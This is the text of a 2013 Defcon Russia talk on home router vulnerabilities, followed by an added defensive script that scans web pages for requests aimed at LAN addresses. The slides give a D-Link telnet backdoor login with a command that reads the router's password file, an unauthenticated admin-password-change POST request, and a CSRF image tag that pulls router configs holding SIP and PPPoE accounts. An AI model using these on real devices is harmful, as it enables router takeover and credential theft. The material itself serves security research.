Home router security
@090h
@cherboff
DCG #7812 10/08/2013
Defcon Russia (DCG #7812) 2
.:VENDORS:.
VENDORZ = ['D-Link', 'TP-Link', 'ASUS', 'ZyXEL', 'NetGear', 'Cisco Linksys', …]
.:SERVICES:.
SERVICES = [HTTP, TELNET, SSH, DNS, UPNDP, DHCP, TFTP 4 RECOVERY]
.:BUGZ:.
ROUTER_VULN_TYPES = [WPS, COMMAND_INJECTION, PLAIN_TEXT_PASSWORDS, INFO_LEAK, BUFFER_OVERFLOW, AUTH_BYPASS, CSRF, XSS, VENDOR_BACKDOORS]
MEANWHILE IN RUSSIA ZyXEL.popular
MEANWHILE IN RUSSIA TP-Link.popular
MEANWHILE IN RUSSIA D-Link.popular
TP-Link.XSSED
DIR-300? REALLY??!!
WPAPSK.default = 76543210
D-Link.telnet_backd00r
telnet 192.168.1.1
login: Alphanetworks
password: wrgn23_dlwbr_dir300b
cat /var/etc/httpasswd
.:REAL_GAME_RULES:.
DEFAULT_AUTH = {'admin': ['admin', '1234']}
USERS_NEVER_UPDATE = True
ANTIVIRUS_SOFTWARE = None
ONEBUG_EXPLOIT_TARGETS = ['D-Link', 'NetGear', 'Cisco Linksys']
PLATFORM = {'ARCH': 'MIPS', 'OS': 'LiNUX'}
UID = 0
Dir300.no_auth_password_change
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
ONE_BUG_ARMY
DIR300.py + SHODAN
Yet one CSRF story
D-Link DPN-5402 admin/admin…
Wooot?
YES! CSRF?
Evil Plan.
Evil WEB site
CSRF
Evil FTP server
Config
<IMG src=“http://192.168.0.1/goform/cbBackupCfg...
3xplo1T ;-)
Config
• Network conf
• Useless stuff conf
• PPPOE account
• SIP account
Telephony
2-12-85-06
Phone number is
• SIP account
• Not attached 2 device
• Can be used anywhere
• Stolen via stupid CSRF
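A defender-side check for the pattern in the CSRF slides above, where a page on an outside web site embeds an IMG whose src points at the router's LAN address. This is an added example, not code from the original deck: it scans HTML served from a public origin for request-triggering attributes that target private address space. The function names, the sample HTML and the placeholder paths are constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tag/attribute pairs through which a page makes the browser issue a request.
REQUEST_ATTRS = {("img", "src"), ("script", "src"), ("iframe", "src"),
                 ("link", "href"), ("form", "action")}

def is_private_host(host):
    """True for IP literals in private, loopback or link-local space."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname; resolving it is out of scope here
    return ip.is_private or ip.is_loopback or ip.is_link_local

def url_host(url):
    try:
        return urlsplit(url.strip()).hostname or ""
    except ValueError:  # malformed bracketed IPv6 literal
        return ""

class PrivateTargetFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <IMG SRC=...> matches.
        for name, value in attrs:
            if (tag, name) in REQUEST_ATTRS and value and is_private_host(url_host(value)):
                self.hits.append((tag, name, value.strip()))

def find_private_targets(page_url, html):
    """Flag LAN-directed requests embedded in a page served from outside the LAN."""
    if is_private_host(url_host(page_url)):
        return []  # same network as the target: not the cross-site case
    finder = PrivateTargetFinder()
    finder.feed(html)
    finder.close()
    return finder.hits

# Constructed sample: the paths are placeholders, not the endpoint from the slides.
SAMPLE = """<html><body>
<IMG src="http://192.168.0.1/placeholder-path">
<img src="https://cdn.example.com/logo.png">
<script src="http://10.0.0.1/placeholder.js"></script>
</body></html>"""

if __name__ == "__main__":
    for hit in find_private_targets("http://public-site.example/", SAMPLE):
        print("LAN-directed request:", hit)
```

A check like this fits a web proxy or mail gateway content filter; on the device side the fix remains requiring authentication and an anti-CSRF token on state-changing endpoints.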
fin.
$>Questions?